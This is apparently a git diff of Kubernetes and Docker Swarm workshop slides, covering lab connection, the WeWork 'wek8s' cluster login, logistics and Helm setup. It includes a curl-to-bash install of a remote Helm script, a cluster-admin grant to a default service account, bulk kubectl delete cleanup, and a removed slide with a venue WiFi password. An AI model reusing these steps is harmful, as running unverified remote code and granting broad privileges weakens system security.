- - k8s/helm.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -61,10 +67,11 @@ chapters:
|
||||
#- k8s/build-with-kaniko.md
|
||||
- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
#- k8s/extending-api.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
@@ -2,18 +2,34 @@
|
||||
|
||||
- Hello! We are:
|
||||
|
||||
- .emoji[🚁] Alexandre ([@alexbuisine](https://twitter.com/alexbuisine), Enix SAS)
|
||||
- .emoji[👷🏻♀️] AJ ([@s0ulshake](https://twitter.com/s0ulshake), Travis CI)
|
||||
|
||||
- .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Enix SAS)
|
||||
|
||||
- The workshop will run from 9:15am to 5:30pm
|
||||
|
||||
- There will be a lunch break at noon
|
||||
|
||||
(And coffee breaks!)
|
||||
- .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Tiny Shell Script LLC)
|
||||
|
||||
- Feel free to interrupt for questions at any time
|
||||
|
||||
- *Especially when you see full screen container pictures!*
|
||||
|
||||
- Live feedback, questions, help: @@CHAT@@
|
||||
|
||||
(Let's make sure right now that we all are on that channel!)
|
||||
|
||||
---
|
||||
|
||||
## Logistics
|
||||
|
||||
Training schedule for the 3 days:
|
||||
|
||||
|||
|
||||
|-------------------|--------------------|
|
||||
| 9:00am | Start of training
|
||||
| 10:30am → 11:00am | Break
|
||||
| 12:30pm → 1:30pm | Lunch
|
||||
| 3:00pm → 3:30pm | Break
|
||||
| 5:00pm | End of training
|
||||
|
||||
- Lunch will be catered
|
||||
|
||||
- During the breaks, the instructors will be available for Q&A
|
||||
|
||||
- Make sure to hydrate / caffeinate / stretch out your limbs :)
|
||||
|
||||
@@ -1,17 +0,0 @@
|
||||
.remark-slide-content:not(.pic) {
|
||||
background-repeat: no-repeat;
|
||||
background-position: 99% 1%;
|
||||
background-size: 8%;
|
||||
background-image: url(https://enix.io/static/img/logos/logo-domain-cropped.png);
|
||||
}
|
||||
|
||||
div.extra-details:not(.pic) {
|
||||
background-image: url("images/extra-details.png"), url(https://enix.io/static/img/logos/logo-domain-cropped.png);
|
||||
background-position: 0.5% 1%, 99% 1%;
|
||||
background-size: 4%, 8%;
|
||||
}
|
||||
|
||||
.remark-slide-content:not(.pic) div.remark-slide-number {
|
||||
top: 16px;
|
||||
right: 112px
|
||||
}
|
||||
133
slides/shared/connecting.md
Normal file
@@ -0,0 +1,133 @@
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
## FIXME find a way to reset the cluster, maybe?
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -169,143 +169,3 @@ class: in-person, extra-details
|
||||
- It requires UDP ports to be open
|
||||
|
||||
(By default, it uses a UDP port between 60000 and 61000)
|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
if which kubectl; then
|
||||
kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
|
||||
kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
|
||||
kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
|
||||
fi
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
|
||||
@@ -8,14 +8,8 @@ class: title, self-paced
|
||||
|
||||
class: title, in-person
|
||||
|
||||
@@TITLE@@<br/></br>
|
||||
|
||||
.footnote[
|
||||
WiFi : 123_SEBASTOPOL
|
||||
<br/>
|
||||
Mot de passe : Sebastopol02
|
||||
@@TITLE@@
|
||||
|
||||
**Slides
|
||||
[:](https://www.youtube.com/watch?v=h16zyxiwDLY)
|
||||
[→](https://www.youtube.com/watch?v=h16zyxiwDLY)
|
||||
@@SLIDES@@**
|
||||
]
|
||||
|
||||
@@ -1,64 +0,0 @@
|
||||
title: |
|
||||
Container Orchestration
|
||||
with Docker and Swarm
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- snap
|
||||
- btp-auto
|
||||
- benchmarking
|
||||
- elk-manual
|
||||
- prom-manual
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- swarm/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- swarm/swarmkit.md
|
||||
- shared/declarative.md
|
||||
- swarm/swarmmode.md
|
||||
- swarm/creatingswarm.md
|
||||
#- swarm/machine.md
|
||||
- swarm/morenodes.md
|
||||
- - swarm/firstservice.md
|
||||
- swarm/ourapponswarm.md
|
||||
- swarm/hostingregistry.md
|
||||
- swarm/testingregistry.md
|
||||
- swarm/btp-manual.md
|
||||
- swarm/swarmready.md
|
||||
- swarm/stacks.md
|
||||
- swarm/cicd.md
|
||||
- swarm/updatingservices.md
|
||||
- swarm/rollingupdates.md
|
||||
- swarm/healthchecks.md
|
||||
- - swarm/operatingswarm.md
|
||||
- swarm/netshoot.md
|
||||
- swarm/ipsec.md
|
||||
- swarm/swarmtools.md
|
||||
- swarm/security.md
|
||||
- swarm/secrets.md
|
||||
- swarm/encryptionatrest.md
|
||||
- swarm/leastprivilege.md
|
||||
- swarm/apiscope.md
|
||||
- - swarm/logging.md
|
||||
- swarm/metrics.md
|
||||
- swarm/gui.md
|
||||
- swarm/stateful.md
|
||||
- swarm/extratips.md
|
||||
- shared/thankyou.md
|
||||
- swarm/links.md
|
||||
@@ -1,63 +0,0 @@
|
||||
title: |
|
||||
Container Orchestration
|
||||
with Docker and Swarm
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- snap
|
||||
- btp-manual
|
||||
- benchmarking
|
||||
- elk-manual
|
||||
- prom-manual
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- swarm/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- swarm/versions.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- swarm/swarmkit.md
|
||||
- shared/declarative.md
|
||||
- swarm/swarmmode.md
|
||||
- swarm/creatingswarm.md
|
||||
#- swarm/machine.md
|
||||
- swarm/morenodes.md
|
||||
- - swarm/firstservice.md
|
||||
- swarm/ourapponswarm.md
|
||||
#- swarm/hostingregistry.md
|
||||
#- swarm/testingregistry.md
|
||||
#- swarm/btp-manual.md
|
||||
#- swarm/swarmready.md
|
||||
- swarm/stacks.md
|
||||
- swarm/cicd.md
|
||||
- swarm/updatingservices.md
|
||||
#- swarm/rollingupdates.md
|
||||
#- swarm/healthchecks.md
|
||||
- - swarm/operatingswarm.md
|
||||
#- swarm/netshoot.md
|
||||
#- swarm/ipsec.md
|
||||
#- swarm/swarmtools.md
|
||||
- swarm/security.md
|
||||
#- swarm/secrets.md
|
||||
#- swarm/encryptionatrest.md
|
||||
- swarm/leastprivilege.md
|
||||
- swarm/apiscope.md
|
||||
- swarm/logging.md
|
||||
- swarm/metrics.md
|
||||
#- swarm/stateful.md
|
||||
#- swarm/extratips.md
|
||||
- shared/thankyou.md
|
||||
- swarm/links.md
|
||||
@@ -1,72 +0,0 @@
|
||||
title: |
|
||||
Container Orchestration
|
||||
with Docker and Swarm
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- in-person
|
||||
- btp-auto
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
#- shared/logistics.md
|
||||
- swarm/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
class: title, self-paced
|
||||
|
||||
Part 1
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- swarm/swarmkit.md
|
||||
- shared/declarative.md
|
||||
- swarm/swarmmode.md
|
||||
- swarm/creatingswarm.md
|
||||
#- swarm/machine.md
|
||||
- swarm/morenodes.md
|
||||
- - swarm/firstservice.md
|
||||
- swarm/ourapponswarm.md
|
||||
- swarm/hostingregistry.md
|
||||
- swarm/testingregistry.md
|
||||
- swarm/btp-manual.md
|
||||
- swarm/swarmready.md
|
||||
- swarm/stacks.md
|
||||
- swarm/cicd.md
|
||||
- |
|
||||
name: part-2
|
||||
|
||||
class: title, self-paced
|
||||
|
||||
Part 2
|
||||
- - swarm/operatingswarm.md
|
||||
- swarm/netshoot.md
|
||||
- swarm/swarmnbt.md
|
||||
- swarm/ipsec.md
|
||||
- swarm/updatingservices.md
|
||||
- swarm/rollingupdates.md
|
||||
- swarm/healthchecks.md
|
||||
- swarm/nodeinfo.md
|
||||
- swarm/swarmtools.md
|
||||
- - swarm/security.md
|
||||
- swarm/secrets.md
|
||||
- swarm/encryptionatrest.md
|
||||
- swarm/leastprivilege.md
|
||||
- swarm/apiscope.md
|
||||
- swarm/logging.md
|
||||
- swarm/metrics.md
|
||||
- swarm/stateful.md
|
||||
- swarm/extratips.md
|
||||
- shared/thankyou.md
|
||||
- swarm/links.md
|
||||
@@ -1,71 +0,0 @@
|
||||
title: |
|
||||
Container Orchestration
|
||||
with Docker and Swarm
|
||||
|
||||
chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- in-person
|
||||
- btp-auto
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
#- shared/logistics.md
|
||||
- swarm/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- swarm/versions.md
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
class: title, self-paced
|
||||
|
||||
Part 1
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- swarm/swarmkit.md
|
||||
- shared/declarative.md
|
||||
- swarm/swarmmode.md
|
||||
- swarm/creatingswarm.md
|
||||
#- swarm/machine.md
|
||||
- swarm/morenodes.md
|
||||
- - swarm/firstservice.md
|
||||
- swarm/ourapponswarm.md
|
||||
- swarm/hostingregistry.md
|
||||
- swarm/testingregistry.md
|
||||
- swarm/btp-manual.md
|
||||
- swarm/swarmready.md
|
||||
- swarm/stacks.md
|
||||
- |
|
||||
name: part-2
|
||||
|
||||
class: title, self-paced
|
||||
|
||||
Part 2
|
||||
- - swarm/operatingswarm.md
|
||||
#- swarm/netshoot.md
|
||||
#- swarm/swarmnbt.md
|
||||
- swarm/ipsec.md
|
||||
- swarm/updatingservices.md
|
||||
- swarm/rollingupdates.md
|
||||
#- swarm/healthchecks.md
|
||||
- swarm/nodeinfo.md
|
||||
- swarm/swarmtools.md
|
||||
- - swarm/security.md
|
||||
- swarm/secrets.md
|
||||
- swarm/encryptionatrest.md
|
||||
- swarm/leastprivilege.md
|
||||
- swarm/apiscope.md
|
||||
#- swarm/logging.md
|
||||
#- swarm/metrics.md
|
||||
- swarm/stateful.md
|
||||
- swarm/extratips.md
|
||||
- shared/thankyou.md
|
||||
- swarm/links.md
|
||||
234
slides/wek8s/connecting.md
Normal file
@@ -0,0 +1,234 @@
|
||||
name: connecting-to-wek8s
|
||||
|
||||
## Connecting to wek8s
|
||||
|
||||
- Let's see what it entails to connect to one of our wek8s clusters
|
||||
|
||||
- We need an account on https://we.okta.com/
|
||||
|
||||
(with access to "Dev AWS" environment)
|
||||
|
||||
- We need an account on https://quay.io/
|
||||
|
||||
(with access to images
|
||||
[wework/okta-aws](https://quay.io/repository/wework/okta-aws)
|
||||
and
|
||||
[wework/wek8s-tools](https://quay.io/repository/wework/wek8s-tools))
|
||||
|
||||
- We will obtain AWS credentials through Okta
|
||||
|
||||
- Then, we will use these AWS credentials to obtain Kubernetes credentials
|
||||
|
||||
(because the wek8s cluster we will connect to is using AWS EKS under the hood)
|
||||
|
||||
.warning[These instructions are up-to-date as of May 2019, but may change in the future.]
|
||||
|
||||
---
|
||||
|
||||
## Pulling okta-aws and wek8s-tools images
|
||||
|
||||
- If we are already logged into quay.io, we can skip that step
|
||||
<br/>
|
||||
(the images will be pulled automatically when we need them)
|
||||
|
||||
- ... But this makes it easier to troubleshoot registry issues
|
||||
<br/>
|
||||
(if we get an error *now*, we know where it's coming from)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into quay.io:
|
||||
```bash
|
||||
docker login quay.io
|
||||
```
|
||||
|
||||
- Pull both images:
|
||||
```bash
|
||||
docker pull quay.io/wework/okta-aws
|
||||
docker pull quay.io/wework/wek8s-tools:0.3.2
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining AWS credentials
|
||||
|
||||
- We will use okta-aws to obtain our AWS credentials
|
||||
|
||||
- For convenience, we will use a pre-built okta-aws container
|
||||
|
||||
.warning[If we already have credentials in `~/.aws`, this may overwrite them!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Run okta-aws to obtain AWS credentials and store them in `~/.aws`:
|
||||
```bash
|
||||
docker run -it --rm -v ~/.aws:/package/.aws quay.io/wework/okta-aws
|
||||
```
|
||||
|
||||
- Select `Dev` environment at the first prompt
|
||||
|
||||
- Enter Okta email, password, and MFA code
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying account and role
|
||||
|
||||
The last lines of output of okta-aws will confirm which account we logged into.
|
||||
|
||||
For the `Dev` account, this should look like this:
|
||||
|
||||
```
|
||||
Account: 681484253316
|
||||
Role: AWS-Tech-User
|
||||
Profile: saml
|
||||
```
|
||||
|
||||
... And a few files have been updated in `~/.aws`, including `~/.aws/credentials`.
|
||||
|
||||
Q: How did the container update `~/.aws` on our machine?
|
||||
|
||||
A: Because we mounted that directory into the container with `-v`.
|
||||
|
||||
---
|
||||
|
||||
## Running wek8s-tools
|
||||
|
||||
- Two more steps are necessary to obtain Kubernetes cluster credentials
|
||||
|
||||
- For simplicity, we are going to use a "Swiss Army Knife" image, wek8s-tools
|
||||
|
||||
- This image contains tools to obtain the Kubernetes credentials + many others
|
||||
|
||||
(including kubectl, helm, ...)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start a container using the the wek8s-tools image:
|
||||
```bash
|
||||
docker run --rm -v ~/.aws:/root/.aws -it quay.io/wework/wek8s-tools:0.3.2 sh
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*We are using the `-v` option again, to mount our fresh AWS credentials into this container.*
|
||||
|
||||
---
|
||||
|
||||
## Generating kubeconfig
|
||||
|
||||
- The next step is to generate a kubeconfig file with:
|
||||
|
||||
- the address of the wek8s cluster we want to use
|
||||
|
||||
- instructions to use the AWS IAM authenticator plugin
|
||||
|
||||
- This is done with the `deploy_helper` binary
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the kubeconfig file:
|
||||
```bash
|
||||
deploy_helper fetch_reqs --env wek8s-phoenix --namespace k8s-training
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We now have a `~kube/config` file (in the container).
|
||||
|
||||
---
|
||||
|
||||
## Using the cluster
|
||||
|
||||
- Let's get a shell on this cluster!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Run a one-time Pod with an Alpine container:
|
||||
```bash
|
||||
kubectl -n k8s-training run --restart=Never --rm -it test-$RANDOM --image=alpine
|
||||
```
|
||||
|
||||
- Find out the node's IP address:
|
||||
```bash
|
||||
apk add curl
|
||||
curl https://canihazip.com/s
|
||||
```
|
||||
|
||||
- Exit when done
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using local tools
|
||||
|
||||
.warning[Do not run the commands in this slide! This is not an exercise ☺]
|
||||
|
||||
- What if we wanted to use our local tools, instead of the wek8s-tools image?
|
||||
|
||||
- First, we would need to install the AWS IAM authenticator plugin
|
||||
|
||||
(see [AWS EKS documentation](https://docs.aws.amazon.com/eks/latest/userguide/install-aws-iam-authenticator.html) for instructions)
|
||||
|
||||
- Then, we would need to get the kubeconfig file:
|
||||
```bash
|
||||
docker run --rm -v ~/.aws:/root/.aws -v ~/.kube-wek8s:/root/.kube \
|
||||
quay.io/wework/wek8s-tools:0.3.2 \
|
||||
deploy_helper fetch_reqs --env wek8s-phoenix --namespace k8s-training
|
||||
```
|
||||
|
||||
- This would generate the file `~/.kube-wek8s/config`
|
||||
|
||||
---
|
||||
|
||||
## Permission issues
|
||||
|
||||
.warning[Do not run the commands in this slide! This is not an exercise ☺]
|
||||
|
||||
- If you use Docker Desktop (on Windows or macOS), you should be set
|
||||
|
||||
- Otherwise (on Linux or Docker Toolbox) you will need to fix permissions:
|
||||
```bash
|
||||
chown -R $USER ~/.kube-wek8s
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Connecting to wek8s with local tools
|
||||
|
||||
.warning[Do not run the commands in this slide! This is not an exercise ☺]
|
||||
|
||||
- We would need to tell kubectl (and other tools) to use the file we generated:
|
||||
```bash
|
||||
export KUBECONFIG=~/.kube-wek8s/config
|
||||
```
|
||||
|
||||
- Then we could do some simple commands to test the connection:
|
||||
```bash
|
||||
kubectl get version
|
||||
kubectl get svc -n default kubernetes
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying DockerCoins on wek8s
|
||||
|
||||
.warning[Do not run the commands in this slide! This is not an exercise ☺]
|
||||
|
||||
- We could deploy DockerCoins like this:
|
||||
```bash
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
kubectl -n k8s-training apply -f kubercoins
|
||||
```
|
||||
|
||||
- To access the web UI, we would need an Ingress
|
||||
|
||||
(more on that later)
|
||||
|
||||
- Rather than applying YAML directly, we would use Helm Charts
|
||||
|
||||
(more on that later)
|
||||
667
slides/wek8s/helm.md
Normal file
@@ -0,0 +1,667 @@
|
||||
# Managing stacks with Helm
|
||||
|
||||
- We created our first resources with `kubectl run`, `kubectl expose` ...
|
||||
|
||||
- We have also created resources by loading YAML files with `kubectl apply -f`
|
||||
|
||||
- For larger stacks, managing thousands of lines of YAML is unreasonable
|
||||
|
||||
- These YAML bundles need to be customized with variable parameters
|
||||
|
||||
(E.g.: number of replicas, image version to use ...)
|
||||
|
||||
- It would be nice to have an organized, versioned collection of bundles
|
||||
|
||||
- It would be nice to be able to upgrade/rollback these bundles carefully
|
||||
|
||||
- [Helm](https://helm.sh/) is an open source project offering all these things!
|
||||
|
||||
---
|
||||
|
||||
## Helm concepts
|
||||
|
||||
- `helm` is a CLI tool
|
||||
|
||||
- `tiller` is its companion server-side component
|
||||
|
||||
- A "chart" is an archive containing templatized YAML bundles
|
||||
|
||||
- Charts are versioned
|
||||
|
||||
- Charts can be stored on private or public repositories
|
||||
|
||||
---
|
||||
|
||||
## Helm 2 / Helm 3
|
||||
|
||||
- Helm 3.0.0-alpha.1 was released May 15th, 2019
|
||||
|
||||
- Helm 2 is still the stable version (and will be for a while)
|
||||
|
||||
- Helm 3 removes Tiller (which simplifies permission management)
|
||||
|
||||
- There are many other smaller changes
|
||||
|
||||
(see [Helm release changelog](https://github.com/helm/helm/releases/tag/v3.0.0-alpha.1) for the full list!)
|
||||
|
||||
---
|
||||
|
||||
## Installing Helm
|
||||
|
||||
- If the `helm` CLI is not installed in your environment, install it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check if `helm` is installed:
|
||||
```bash
|
||||
helm
|
||||
```
|
||||
|
||||
- If it's not installed, run the following command:
|
||||
```bash
|
||||
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Installing Tiller
|
||||
|
||||
- Tiller is composed of a *service* and a *deployment* in the `kube-system` namespace
|
||||
|
||||
- They can be managed (installed, upgraded...) with the `helm` CLI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy Tiller:
|
||||
```bash
|
||||
helm init
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If Tiller was already installed, don't worry: this won't break it.
|
||||
|
||||
At the end of the install process, you will see:
|
||||
|
||||
```
|
||||
Happy Helming!
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fix account permissions
|
||||
|
||||
- Helm permission model requires us to tweak permissions
|
||||
|
||||
- In a more realistic deployment, you might create per-user or per-team
|
||||
service accounts, roles, and role bindings
|
||||
|
||||
.exercise[
|
||||
|
||||
- Grant `cluster-admin` role to `kube-system:default` service account:
|
||||
```bash
|
||||
kubectl create clusterrolebinding add-on-cluster-admin \
|
||||
--clusterrole=cluster-admin --serviceaccount=kube-system:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
(Defining the exact roles and permissions on your cluster requires
|
||||
a deeper knowledge of Kubernetes' RBAC model. The command above is
|
||||
fine for personal and development clusters.)
|
||||
|
||||
---
|
||||
|
||||
## Repositories
|
||||
|
||||
- A repository is a remote server hosting a number of charts
|
||||
|
||||
(any HTTP server can be a chart repository)
|
||||
|
||||
- Repositories are identified by a local name
|
||||
|
||||
- We can add as many repositories as we need
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the repositories currently available:
|
||||
```bash
|
||||
helm repo list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
When we install Helm, it automatically configures a repository called `stable`.
|
